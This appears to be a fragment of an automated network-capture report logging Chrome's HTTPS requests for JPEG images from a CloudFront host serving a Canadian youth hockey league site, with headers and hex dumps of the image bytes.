                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 56 6d 63 39 63 34 7a 64 38 64 39 63 48 56 63 31 75 74 47 45 4e 68 5a 6d 72 70 70 31 38 79 51 35 79 6c 71 57 52 66 78 5f 61 71 56 41 33 54 68 51 33 77 73 31 4b 4b 71 36 51 6d 32 62 65 6d 5a 6d 79 38 32 61 68 47 6a 56 5a 32 51 73 59 43 4d 4f 30 36 74 61 44 52 6a 58 77 63 79 46 77 74 35 39 58 42 47 62 44 5a 38 39 7a 57 4a 4c 68 48 36 65 6b 4d 70 4a 78 72 5a 6c 53 43 79 49 69 57 34 32 4c 4a 6a 6a 52 77 32 34 57 76 50 57 4e 6f 44 78 67 32 54 6b 42 42 61 33 36 34 58 41 69 57 63 47 57 47 30 54 6c 44 49 54 51 77 72 4a 30 75 73 79 65 4b 54 4e 76 4e 73 65 37 66 58 67 6a 61 52 32 48 58 2d 66 33 4c 6d 6d 4b 41 64 79 57 4b 67 7a 78 46 4c 74 35 4f 2d 51 61 6d 73 41 6f 53 30 4e 6d 5f 48 69 58 57 59 67 38 79 64 52 77 55 65 58 4d 55 67 55 75 63 6e 36 75 42 79 49 76 44 49
                                                                                                                          Data Ascii: Vmc9c4zd8d9cHVc1utGENhZmrpp18yQ5ylqWRfx_aqVA3ThQ3ws1KKq6Qm2bemZmy82ahGjVZ2QsYCMO06taDRjXwcyFwt59XBGbDZ89zWJLhH6ekMpJxrZlSCyIiW42LJjjRw24WvPWNoDxg2TkBBa364XAiWcGWG0TlDITQwrJ0usyeKTNvNse7fXgjaR2HX-f3LmmKAdyWKgzxFLt5O-QamsAoS0Nm_HiXWYg8ydRwUeXMUgUucn6uByIvDI
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 59 5f 78 4b 2d 6f 45 5a 4c 32 67 4a 30 68 68 4e 51 70 6e 41 4c 51 5f 65 6f 76 45 68 38 59 6c 61 36 49 61 4d 52 53 6c 34 30 6d 70 55 37 59 70 51 55 59 61 56 37 43 50 65 44 56 6d 5f 59 6e 4f 73 55 45 48 6c 46 4d 4c 58 48 6e 6a 37 6a 38 70 6e 41 69 67 77 4a 4a 33 64 68 5f 6a 65 7a 46 34 41 69 47 58 5f 73 2d 70 38 58 49 68 46 30 6a 76 35 61 4c 61 6a 6b 41 64 2d 64 72 6a 53 4f 47 36 63 65 6f 75 70 2d 37 5a 6f 77 35 70 55 76 79 58 52 41 61 6e 49 39 72 4e 45 4a 4c 49 47 51 63 66 5f 74 64 79 4a 66 4b 36 31 55 38 76 4a 35 2d 65 63 45 68 6a 65 51 73 70 7a 66 44 45 59 53 63 4b 72 6b 55 4f 43 5a 55 52 59 37 63 34 64 34 30 55 66 77 73 75 37 30 6f 6e 42 51 48 35 45 6c 44 55 31 32 63 76 75 6e 6b 68 70 6e 79 75 6e 57 38 66 64 57 71 74 6a 50 30 61 38 65 76 38 6f 45 6b 55
                                                                                                                          Data Ascii: Y_xK-oEZL2gJ0hhNQpnALQ_eovEh8Yla6IaMRSl40mpU7YpQUYaV7CPeDVm_YnOsUEHlFMLXHnj7j8pnAigwJJ3dh_jezF4AiGX_s-p8XIhF0jv5aLajkAd-drjSOG6ceoup-7Zow5pUvyXRAanI9rNEJLIGQcf_tdyJfK61U8vJ5-ecEhjeQspzfDEYScKrkUOCZURY7c4d40Ufwsu70onBQH5ElDU12cvunkhpnyunW8fdWqtjP0a8ev8oEkU
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 59 6c 5a 4e 55 33 4e 47 54 32 73 31 54 45 45 76 63 44 42 6a 59 6d 6c 61 53 58 6c 42 53 44 4a 56 61 55 64 74 52 7a 56 76 4e 47 39 73 53 7a 68 58 51 57 6c 46 59 7a 52 30 61 33 63 33 53 31 52 6f 4f 48 42 46 65 6c 6c 36 56 45 70 74 56 7a 64 55 4e 31 63 72 55 7a 64 68 64 46 6c 77 4d 6b 56 4d 65 57 68 35 4e 30 31 36 56 6c 4a 4c 63 32 4a 76 5a 32 31 72 51 57 64 6e 4f 45 56 43 52 6e 70 42 64 6b 46 34 51 55 4e 4c 63 58 4e 7a 56 6d 68 59 53 32 6b 32 55 47 6c 6c 4e 6b 64 30 4c 7a 4d 34 54 7a 42 7a 63 57 70 45 54 43 39 79 55 47 68 73 65 48 67 79 63 32 4d 7a 61 32 68 58 54 55 31 36 51 6d 35 71 4d 44 45 79 4d 6c 46 4c 63 55 35 53 51 7a 56 7a 64 43 74 6b 65 6b 78 49 51 6c 42 56 61 6b 39 4a 62 6c 64 56 52 6c 46 73 56 6e 68 35 64 44 64 69 4f 47 4a 45 5a 6e 52 71 65 45 5a
                                                                                                                          Data Ascii: YlZNU3NGT2s1TEEvcDBjYmlaSXlBSDJVaUdtRzVvNG9sSzhXQWlFYzR0a3c3S1RoOHBFell6VEptVzdUN1crUzdhdFlwMkVMeWh5N016VlJLc2JvZ21rQWdnOEVCRnpBdkF4QUNLcXNzVmhYS2k2UGllNkd0LzM4TzBzcWpETC9yUGhseHgyc2Mza2hXTU16Qm5qMDEyMlFLcU5SQzVzdCtkekxIQlBVak9JbldVRlFsVnh5dDdiOGJEZnRqeEZ


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          88192.168.11.204990654.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC443OUTGET /app/uploads/gthl/2024/12/19132310/33-waiting-for-the-pass-e1734632610661-730x427.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 47127
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Thu, 19 Dec 2024 18:23:33 GMT
                                                                                                                          ETag: "a94f77ccb534baa196549ec446c6b548"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 13af704549c5ac5d9fb78e3b737019ec.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: hvb1BOaij1e_oUqsbvYDc9jkeKMgVoebo6XSCbKNbmtAMk8Py6e_0w==
                                                                                                                          2025-01-13 21:01:19 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 58 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 02 01 3b 00 02 00 00 00 0f 00 00 00 26 82 98 00 02 00 00 00 19 00 00 00 36 00 00 00 00 47 6c 65 6e 6e 20 53 74 65 70 6c 6f 63 6b 00 00 32 30 32 33 0a 67 73 74 65 70 6c 6f 63 6b 40 67 6d 61 69 6c 2e 63 6f 6d 00 00 ff e2 01 d8 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 01 c8 6c 63 6d 73 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e2 00 03 00 14 00 09 00 0e 00 1d 61 63 73 70 4d 53 46 54 00 00 00 00 73 61 77 73 63 74 72 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 68 61 6e 64 9d 91 00 3d 40 80 b0 3d 40 74 2c 81 9e a5 22 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: JFIFXExifMM*;&6Glenn Steplock2023gsteplock@gmail.comICC_PROFILElcmsmntrRGB XYZ acspMSFTsawsctrl-hand=@=@t,"
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 3c 46 3f 72 ff 00 34 66 b5 98 5f 73 c9 bd bd 32 97 78 3e 2b d2 ed 33 56 de 93 03 f4 5e 79 2c 17 18 cf b8 f6 95 cb 3f 0e 71 08 f5 c4 cc d6 a3 13 fb c1 bc 79 a3 79 cf c5 84 9f b1 ee 1b 48 c0 ca 63 ad f5 ec c0 11 39 c5 71 cb 85 6a e0 e9 e3 97 d1 99 a9 c1 f7 25 12 bd a7 87 bb ee a2 ac a8 32 d1 cf 0c f2 e2 19 18 e6 3f 73 b0 36 91 83 95 9d b5 d8 30 c1 25 68 cb 8f f7 79 e0 7c d6 b3 fc 4b 54 5c ad da 3e 0a 3b 5d 1c 4d a3 ab 90 b6 aa 76 80 1d 1e dc 39 a0 1f 0c e0 fd 97 d8 70 9f 04 f1 0c ea 39 32 e4 f2 d3 fc 6f e9 fe 4f 3f 51 c4 31 42 d2 5c c7 37 3a 59 34 f6 a1 26 07 ef 75 0d 56 58 f6 72 0e c7 f5 07 e8 ba 82 d3 db 6e 9d b9 1a 66 32 f5 1c 72 ce d0 43 25 69 6e 0f 91 27 80 57 20 53 d6 bd af 79 df bb 18 01 c4 78 29 a1 a9 94 c5 8c 34 ed 27 39 5f a6 f1 1e 01 1d 74 63 79
                                                                                                                          Data Ascii: <F?r4f_s2x>+3V^y,?qyyHc9qj%2?s60%hy|KT\>;]Mv9p92oO?Q1B\7:Y4&uVXrnf2rC%in'W Syx)4'9_tcy
                                                                                                                          2025-01-13 21:01:19 UTC3256INData Raw: 48 5b 23 b3 ee c6 a5 8c 36 a6 f4 37 bc 7e 53 d0 2b ff 00 65 1a 4e 7d 27 a6 a1 b7 d4 3f 7b 99 c1 3e 05 5d db 18 68 e0 00 b0 58 d5 d9 9b cb 2e 86 2a dd 61 a6 a0 8d ac 82 26 b0 01 e0 16 43 d9 02 9b 38 49 bd 6c 35 1e c0 07 80 09 78 f2 4e e3 c9 23 b6 9e a1 42 09 ee 95 05 65 15 25 7c 26 1a a8 99 2c 67 c1 c1 4a 76 04 d3 33 5b f9 49 f9 20 28 17 bd 0d 45 0c f2 9a 1a 62 f2 f3 91 0e e0 01 cf a9 51 c1 a1 e9 5f 2d 5d 0c 4f 96 29 20 6e e6 90 46 0b 8b 41 f2 f5 c2 b6 5e 24 6c ed 0e 8b 7c 72 b3 d3 aa c3 4d 55 23 5d 34 ee 76 c7 4e 00 90 b4 1e 98 00 e3 ec b5 49 b8 b3 25 ba 31 5a 67 4a 3a e4 c9 4d 54 b2 40 1a 08 02 3c 79 9c 7e 81 49 5b d9 75 53 f7 7b 1e a2 a8 8b 20 f1 24 21 d8 fd 42 cc 50 6a 7b 65 b6 9f 61 12 6e ea ec 34 e1 3d fd a1 5a 18 70 5d 27 d5 ab 64 53 ad cc 5b dc d3
                                                                                                                          Data Ascii: H[#67~S+eN}'?{>]hX.*a&C8Il5xN#Be%|&,gJv3[I (EbQ_-]O) nFA^$l|rMU#]4vNI%1ZgJ:MT@<y~I[uS{ $!BPj{ean4=Zp]'dS[
                                                                                                                          2025-01-13 21:01:19 UTC11590INData Raw: 43 40 f2 e3 09 c9 43 98 c0 55 56 d7 eb 4a d6 d7 5f ae 2d 7b d9 fb a6 34 e0 70 3c 07 a2 da 56 1d 51 0d e2 8d 96 c8 2d 36 db 7d 1d 0b 36 33 d8 84 81 cf 79 18 c3 c9 27 3d 09 5a c2 cb a7 ab 22 91 90 54 41 24 8c de 1c cc b0 90 1c 3c 3e aa fd 6b d2 1a 8a 8e 10 68 8f b1 87 e1 f2 17 80 49 23 a1 1f 42 b6 63 58 db 6a 4c d5 93 9d 57 2a 2b a2 0d 71 55 5a ca 86 d5 c1 0b 9d de 06 06 b9 a0 6d 1c 3b e6 16 53 4e 6b 1d 75 a3 a0 15 74 97 70 da 5a 32 63 ee 08 05 8f de 7a ed e8 ee 9d 56 7e 92 c1 70 64 32 41 57 5c f9 9e 1a e0 c2 c6 96 88 f7 75 c6 07 aa 81 9d 9e f7 94 ee 89 d5 f5 3b 1c 41 31 e0 86 13 e6 42 de a7 87 7d 8d 5c 99 6b 66 6e ce cb 6d 66 eb 4f 0e b2 ab ab a6 ae a9 b8 c6 65 dc c8 36 18 de 4e 1c 3a 9c 11 82 15 9f 54 c3 ed 10 c6 ef 10 1c d0 7c 41 23 23 f9 7e aa 8b d9 c5
                                                                                                                          Data Ascii: C@CUVJ_-{4p<VQ-6}63y'=Z"TA$<>khI#BcXjLW*+qUZm;SNkutpZ2czV~pd2AW\u;A1B}\kfnmfOe6N:T|A##~


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          89192.168.11.204990554.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC687OUTGET /app/uploads/gthl/2024/10/10101535/2024-World-Mental-Health-Day-Challenge-1600x900-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 24312
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Thu, 10 Oct 2024 14:15:37 GMT
                                                                                                                          ETag: "f69cc52cd81a54b5012b2ada2461726b"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 09028890675e48687e2855f3bdad98ea.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 0zq4212t9ryACdN2MCvU8SN04g0GGiWwwZfSvYunog3z7Gn8GTWfYw==
                                                                                                                          2025-01-13 21:01:19 UTC8557INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 08 01 02 06 07 09 ff c4 00 5b 10 00 01 03 03 01 04 06 06 06 04 09 06 0a 0a 03 00 01 00 02 03 04 05 11 06 07 12 21 31 08 13 22 41 51 61 14 15 32 71 81 91 23 52
                                                                                                                          Data Ascii: JFIF&&CC"[!1"AQa2q#R
                                                                                                                          2025-01-13 21:01:19 UTC15755INData Raw: 11 dc a7 ea fc 0f f8 65 ac 6f 26 a1 52 9c 9e 73 1d fe 25 d7 74 ba f8 9f 34 af b4 ad 5a e2 e1 db 51 ba ab 4e 71 8a 8e 1c b1 ee c1 b6 a3 b3 fc ad bc 2f 37 d8 f7 8e d9 9e 92 66 a5 b4 6a c7 0a b3 5f 64 a5 8e 92 94 99 fb 1d 5b 1a 5a 37 86 38 9c 38 f1 56 da a6 c5 67 d6 96 2a 9d 37 79 eb 0d 1d 5e e8 90 44 fd c7 76 5c 1c 30 7b b8 80 b5 a7 a5 7f 48 cb 96 89 a7 a6 d1 da 22 e8 69 af 95 5b b3 d4 d4 c7 87 3a 96 1e e0 33 91 bc e3 f9 0f 30 be 73 d1 d3 5e 6d e3 6a 9a e6 18 2b f6 85 75 16 2b 6b 9b 3d c5 e1 b1 8d f1 9e cc 40 ee f3 71 1f 01 95 de db 83 aa d4 d3 27 a8 cd c6 14 9e 5b 4f 39 6b a6 70 97 7e 8b c4 ad b9 e3 4a ff 00 89 52 a1 cf 39 d5 a7 85 16 9f c1 87 cc 92 79 db 0d e7 c8 db db 9e c6 74 4d eb 4c da 34 9d 64 75 c6 82 c8 e7 3a 90 32 a3 0f 04 f3 de 76 38 f3 59 f5 de
                                                                                                                          Data Ascii: eo&Rs%t4ZQNq/7fj_d[Z788Vg*7y^Dv\0{H"i[:30s^mj+u+k=@q'[O9kp~JR9ytML4du:2v8Y


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          90192.168.11.204991054.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC426OUTGET /app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC494INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 87962
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Tue, 09 Jan 2024 14:56:33 GMT
                                                                                                                          ETag: "4acb2561715fb939fa4403a1fe259898"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 65e185f36e65abff9322e261be3491d4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: XSiDuX9wYYZYjUqaxg8xqm-uGeJgT3fg1cp3pthOae0WUNcKpXmNwg==
                                                                                                                          Age: 1
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 31 34 36 32 38 39 39 37 37 37 2c 20 32 30 32 33 2f 30 36 2f 32 35 2d 32 33 3a 35 37 3a 31 34 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RD
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 5e 0d 15 78 a1 7c 1a a6 a1 4c e0 36 22 5d 00 75 01 1d 9b 87 b0 88 f5 21 e5 83 1b 62 9a 85 3a c5 f0 07 b9 00 74 0b a1 ed c0 89 b5 4c a0 51 13 a6 50 10 02 18 bf 70 77 0f b4 34 1d 44 47 50 87 33 88 e1 b0 be 43 38 6d 92 b9 39 71 e3 bd d2 87 55 e3 a6 4f 85 c3 f1 dc 82 8a 9f c5 bc 9f 73 76 61 8f 6d cf 72 dd 42 ab 5d ad 5a 80 b4 ca 9d d9 da d3 18 f2 42 0d 57 2d 80 50 66 e0 be e8 c6 6a f5 a3 80 2a a5 e8 5b 23 75 59 ed bb 6b db 7b 89 af ed 66 ba 6b 72 b3 d9 e4 ea a8 85 d9 9d 3d b7 8c 65 94 30 07 89 1e c8 0c 8c 38 63 01 ad e9 72 6a 4f 0c 8b 1d bc f1 c4 24 06 29 eb 90 97 03 2b f0 57 f6 92 84 0a af 26 6a 32 9e 6d f3 39 f1 15 cb e9 6b 2c be 52 6d 71 e2 bc 15 ed 4c 58 eb 8e 31 18 ca 09 5c f2 96 3e a4 f1 e9 5e 1c 49 71 bf f0 75 cb bd 81 6b 35 85 36 11 f6 cb 02 d3 6d e0
                                                                                                                          Data Ascii: ^x|L6"]u!b:tLQPpw4DGP3C8m9qUOsvamrB]ZBW-Pfj*[#uYk{fkr=e08crjO$)+W&j2m9k,RmqLX1\>^Iquk56m
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: dc 3f 48 c7 9a 88 d1 48 c5 4b 37 0b 9b cd e1 bc 34 f4 d1 b4 a9 f7 2d ed ad b5 ea 2d dd dc 91 88 d6 08 12 59 0a c3 3c 70 25 ba 0e ba 5a a1 98 4a 13 33 ac d1 aa b0 55 a9 49 dc 6d f8 fd 6a f7 9a 57 36 7c d6 a1 d7 a1 b1 fe 1d e3 fa 39 03 25 3d 5a dc f9 dc 15 ca 8d 31 0f 61 96 a4 44 5a ef d0 4f a0 57 2c 1d 0e 72 b1 68 90 b1 ae dd ef 8d 19 6a 8a 65 03 2d 1c fc e7 3e 2f 60 76 a6 7d a9 37 b9 eb d2 41 7b a6 46 a2 78 e2 54 02 04 bc 99 5a 39 8a af 94 51 82 a9 4f 66 92 83 c7 28 27 ac f7 9f e2 6b 48 df 3a 2c 1a 8f 6f 21 d4 74 5d e4 d2 bd 84 d7 4d 3b fb eb e8 f6 86 39 ed 03 4a 94 a3 5e dc 4a 64 98 12 d2 46 d6 65 33 64 99 86 1b 93 24 ce 40 d4 31 93 7a a5 1a b4 db 1e 47 66 eb e2 99 fe 47 1e c6 ba 98 3c 75 06 84 01 31 0d c7 ea 43 66 32 d2 4f dc 35 78 4a 4c cb d9 a9 07 2e
                                                                                                                          Data Ascii: ?HHK74--Y<p%ZJ3UImjW6|9%=Z1aDZOW,rhje->/`v}7A{FxTZ9QOf('kH:,o!t]M;9J^JdFe3d$@1zGfG<u1Cf2O5xJL.
                                                                                                                          2025-01-13 21:01:19 UTC14808INData Raw: 4d 14 d1 67 1b 15 13 1c d1 16 8c 18 b5 49 16 4c 59 b7 45 bb 74 93 49 32 10 3b 0d b5 b5 b5 9d b4 76 56 71 c7 0d 9c 31 ac 71 c7 1a aa 47 1c 68 02 a2 22 28 0a 88 8a 02 aa a8 0a aa 00 00 01 8e 1d 3c f7 17 53 c9 77 77 24 93 5e 4d 23 3c 92 3b 17 92 49 1c 96 77 77 62 59 dd 98 96 66 62 59 89 a9 35 c2 93 a1 53 da e4 6b 1b 2c 78 f2 72 c3 59 6b 7c c8 05 a5 ba b0 54 9e 16 3e cf 10 ce cc e6 3a 19 d3 fa fb c5 08 aa 6d 65 1a a2 e4 4c dd 43 10 e5 22 9a 08 94 c1 a8 75 5a 98 a7 87 8c 71 c9 9f 8d 3f 86 dc 4c e2 81 4a 8d 85 89 c9 ef e3 05 25 b1 9e 3c 2b 3b 6e 7d bf bd 32 4a 1d 92 99 4a e2 a8 95 c4 04 5b f5 c0 34 09 47 0d 9b 15 30 d1 ab 13 00 01 7a 7c bd 78 39 fa bf 06 00 0c 3e 7d 79 0d 94 4b 8a 70 d4 25 46 a7 87 f0 ec 7c ad 6e fd 7c a2 42 b5 4a f3 78 b1 c5 56 ad b1 b7 91 4a
                                                                                                                          Data Ascii: MgILYEtI2;vVq1qGh"(<Sww$^M#<;IwwbYfbY5Sk,xrYk|T>:meLC"uZq?LJ%<+;n}2JJ[4G0z|x9>}yKp%F|n|BJxVJ
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 6f 25 71 f7 19 e4 bb 93 bd e6 39 94 d2 52 6e fc ec e7 02 98 00 87 39 80 a0 50 00 00 8d 68 31 5c d4 d1 b1 06 0e 4c fc 57 61 1c 01 cc 6b dd 1c 6d 79 35 85 05 19 b6 8e 49 55 66 f6 1d b3 a7 35 fb 47 85 fb 76 ad ed 60 d3 df 44 b6 44 8f bc 0b 15 ba 22 7e c2 01 e3 4c e0 40 e1 7d c9 ee 7e e4 da f7 77 1a 3e 8b 69 6a 2e 96 20 d1 cf 29 77 1c 52 b5 e8 8c a0 90 d9 80 f6 c0 39 7c ea 31 e9 de d0 76 43 68 ef 6d 2a db 71 eb d7 b7 8d 6c d3 b2 cb 6d 10 48 e8 51 e9 97 ad ed 36 52 b9 58 8c 99 bd ae 74 20 e1 41 13 01 e1 e7 78 67 2b 50 ea 14 f4 11 af c1 3d 9b 06 14 a8 f7 6b 29 13 66 ab 3b 83 8a 56 db 1f 24 9c 90 3d 51 fd b4 d2 32 24 75 1f 27 e5 09 04 24 14 4c 1b 98 a5 f1 90 9e 5e fd 75 dc 5f 7f d8 eb 7a c5 c4 8f af 4c d1 13 72 d9 41 89 c3 48 12 8a 81 69 0b 50 23 46 29 11 8c 48
                                                                                                                          Data Ascii: o%q9Rn9Ph1\LWakmy5IUf5Gv`DD"~L@}~w>ij. )wR9|1vChm*qlmHQ6RXt Axg+P=k)f;V$=Q2$u'$L^u_zLrAHiP#F)H
                                                                                                                          2025-01-13 21:01:19 UTC7618INData Raw: 3f 88 5c 8c 97 ab c2 dc 22 31 ab b9 68 5b 15 69 8d c2 0c 91 76 0a 8c 8c ec 9d 66 49 b3 77 6c a5 da 55 19 4f af 6a 51 b2 e8 3b 4b 40 f6 40 70 32 85 28 94 0c 60 01 ad 6d d8 0e ef 5e 69 10 eb 96 9a 34 92 e9 f7 16 eb 3c 79 27 b5 69 1e 27 50 ca e2 05 9c cf 42 08 e1 d3 cd c4 02 2a 69 8a 17 5f 12 7d 92 b1 d6 a7 db f7 ba ec 50 ea 76 d7 2f 6f 2e 7b 7b c5 89 26 8d 8a 3a 1b 86 b7 16 fc 19 48 af 57 2f 02 41 20 57 00 cc 6f 80 b2 fe 5b 62 fe 56 81 47 92 9a 87 8b 76 68 f9 09 b7 2e 62 eb f0 6d 24 48 04 13 c6 ab 37 64 7f 11 14 12 44 15 48 06 6e 0b 0a c0 65 53 28 97 72 84 03 6b fb 5f b5 1d c3 de 42 66 db ba 55 c4 f0 db c8 63 91 d8 c7 0c 69 20 15 31 99 67 78 a3 ea 00 45 50 36 61 99 45 2a cb 5d 93 77 f7 9b b6 1b 11 a0 8f 74 6b 16 d6 f3 dc c6 24 8a 34 12 5c 4a f1 93 41 20 8a
                                                                                                                          Data Ascii: ?\"1h[ivfIwlUOjQ;K@@p2(`m^i4<y'i'PB*i_}Pv/o.{{&:HW/A Wo[bVGvh.bm$H7dDHneS(rk_BfUci 1gxEP6aE*]wtk$4\JA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          91192.168.11.204990954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC663OUTGET /app/uploads/gthl/2022/11/17161524/IMG_9525-e1734465590754-730x437.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
